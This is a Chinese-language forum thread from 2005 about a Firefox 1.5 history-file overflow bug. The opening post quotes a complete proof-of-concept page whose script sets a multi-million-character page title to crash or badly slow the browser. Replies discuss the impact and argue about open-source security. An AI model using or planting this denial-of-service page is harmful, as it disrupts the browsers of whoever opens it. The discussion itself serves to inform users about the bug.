Holt
火狐狸
火狐狸
  • UID8960
  • 注册日期2005-09-29
  • 最后登录2009-08-02
  • 发帖数249
  • 经验10枚
  • 威望0点
  • 贡献值0点
  • 好评度0点
阅读:3901回复:10

Firefox 1.5恶意代码现身

楼主#
更多 发布于:2005-12-09 12:50
Firefox也开始面临微软IE的尴尬局面--越来越多“安全”人士开始为Firefox找漏洞,这不,Packetstorm Security昨天刚刚公布了Firefox最新1.5版的缓存溢出漏洞恶意代码。

    该代码利用Firefox 1.5历史数据库无法处理超长页面的Bug,采用该代码的网页将直接导致Firefox崩溃。

    解决该漏洞的唯一方式--在Firefox启动前删除history.dat文件。“该隐患经过测试确实存在,目前尚未有任何补丁发布,”SANS Internet Storm Center的John Bambenek表示,“不过,该漏洞仅会导致Firefox崩溃,目前尚不会造成更多危害。”
以下是引用片段,仅供参考和学习测试:
<html><head><title>heh</title><script type="text/javascript">
function ex() {
        var buffer = "";
        for (var i = 0; i < 5000; i++) {
                buffer += "A";
        }
        var buffer2 = buffer;
        for (i = 0; i < 500; i++) {
                buffer2 += buffer;
        }
        document.title = buffer2;
}
</script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
</a></body></html>
Cye3s
千年狐狸
千年狐狸
  • UID155
  • 注册日期2004-11-25
  • 最后登录2024-04-28
  • 发帖数1322
  • 经验95枚
  • 威望0点
  • 贡献值34点
  • 好评度14点
  • 社区居民
  • 忠实会员
1楼#
发布于:2005-12-09 12:50
点按钮时只是标题变成5000×500个A,没事
但是这是要写到“历史”里,history.dat里也就多了一堆00A$
体积暴增……
关掉FF再打开就要好久才能正常使用
我很懒...
CooB
千年狐狸
千年狐狸
  • UID2829
  • 注册日期2005-02-06
  • 最后登录2023-05-23
  • 发帖数2176
  • 经验140枚
  • 威望0点
  • 贡献值18点
  • 好评度3点
  • 社区居民
  • 忠实会员
2楼#
发布于:2005-12-09 12:50
没有太大危害,仅仅是要关掉再开才会体现出来,很久才能正常使用,崩溃倒不会
CrossBud
黄金狐狸
黄金狐狸
  • UID7038
  • 注册日期2005-06-29
  • 最后登录2016-08-31
  • 发帖数5948
  • 经验12枚
  • 威望2点
  • 贡献值40点
  • 好评度20点
  • 社区居民
3楼#
发布于:2005-12-09 12:50
这有什么好尴尬的?
开源软件就是需要大家一起来发现问题和完善的
只有商业软件并且是某某大头才会有尴尬
desatan
千年狐狸
千年狐狸
  • UID5373
  • 注册日期2005-04-22
  • 最后登录2008-10-16
  • 发帖数1033
  • 经验10枚
  • 威望0点
  • 贡献值0点
  • 好评度0点
4楼#
发布于:2005-12-09 12:50
刚把补丁打上。
john
火狐狸
火狐狸
  • UID8536
  • 注册日期2005-09-10
  • 最后登录2006-06-21
  • 发帖数114
  • 经验10枚
  • 威望0点
  • 贡献值0点
  • 好评度0点
5楼#
发布于:2005-12-09 12:50
这有什么好尴尬的?
开源软件就是需要大家一起来发现问题和完善的
只有商业软件并且是某某大头才会有尴尬

不错
我的主页:
http://blog.donews.com/cpunk
http://cpunk.blogcn.com
我不反微软, 但我绝对反微软的垄断
没什么意思
小狐狸
小狐狸
  • UID6928
  • 注册日期2005-06-22
  • 最后登录2006-10-31
  • 发帖数37
  • 经验10枚
  • 威望0点
  • 贡献值0点
  • 好评度0点
6楼#
发布于:2005-12-09 12:50
fx的使用者越多,漏洞就会逐渐显现出来。。

不可能有没漏洞的软件。。fx也一样。。

只是fx当初的宣传者,一直声称没有漏洞。。这种不负责任的宣传方式,也让很多人对fx产生了厌恶
CrossBud
黄金狐狸
黄金狐狸
  • UID7038
  • 注册日期2005-06-29
  • 最后登录2016-08-31
  • 发帖数5948
  • 经验12枚
  • 威望2点
  • 贡献值40点
  • 好评度20点
  • 社区居民
7楼#
发布于:2005-12-09 12:50
楼上的从哪儿看到Mozilla说过FF没有漏洞了?
sina999
小狐狸
小狐狸
  • UID10427
  • 注册日期2005-12-08
  • 最后登录2006-04-11
  • 发帖数4
  • 经验10枚
  • 威望0点
  • 贡献值0点
  • 好评度0点
8楼#
发布于:2005-12-09 12:50
CrossBud:这有什么好尴尬的?
开源软件就是需要大家一起来发现问题和完善的
只有商业软件并且是某某大头才会有尴尬
回到原帖

軟件有BUG是很正常的事,出補丁解決就是了,還分什麼開源商業。
沒矛盾製造矛盾。
pho
pho
千年狐狸
千年狐狸
  • UID4300
  • 注册日期2005-03-22
  • 最后登录2016-12-14
  • 发帖数2597
  • 经验40枚
  • 威望0点
  • 贡献值16点
  • 好评度2点
  • 社区居民
  • 忠实会员
9楼#
发布于:2005-12-09 12:50
呵呵,楼上的很赞同微软出补丁的速度了
没什么意思
小狐狸
小狐狸
  • UID6928
  • 注册日期2005-06-22
  • 最后登录2006-10-31
  • 发帖数37
  • 经验10枚
  • 威望0点
  • 贡献值0点
  • 好评度0点
10楼#
发布于:2005-12-09 12:50
CrossBud:楼上的从哪儿看到Mozilla说过FF没有漏洞了?回到原帖


我说的是某些“宣传者”说的。。
游客

返回顶部